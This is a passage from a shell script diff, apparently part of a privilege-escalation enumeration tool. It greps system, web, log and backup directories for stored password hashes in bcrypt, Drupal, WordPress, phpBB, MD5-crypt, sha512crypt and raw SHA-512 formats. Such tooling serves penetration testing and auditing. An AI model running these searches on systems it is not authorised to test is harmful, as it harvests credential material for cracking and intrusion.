"\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +wait +print_3title "Searching Blowfish (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +wait +print_3title "Searching Drupal (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +wait +print_3title "Searching Joomlavbulletin (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +wait +print_3title "Searching Linux MD5 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +wait +print_3title "Searching phpbb3 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +wait +print_3title "Searching sha512crypt (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +wait +print_3title "Searching Wordpress (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +wait +echo '' +print_2title "Searching Raw Hashes" +print_3title "Searching sha512 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE 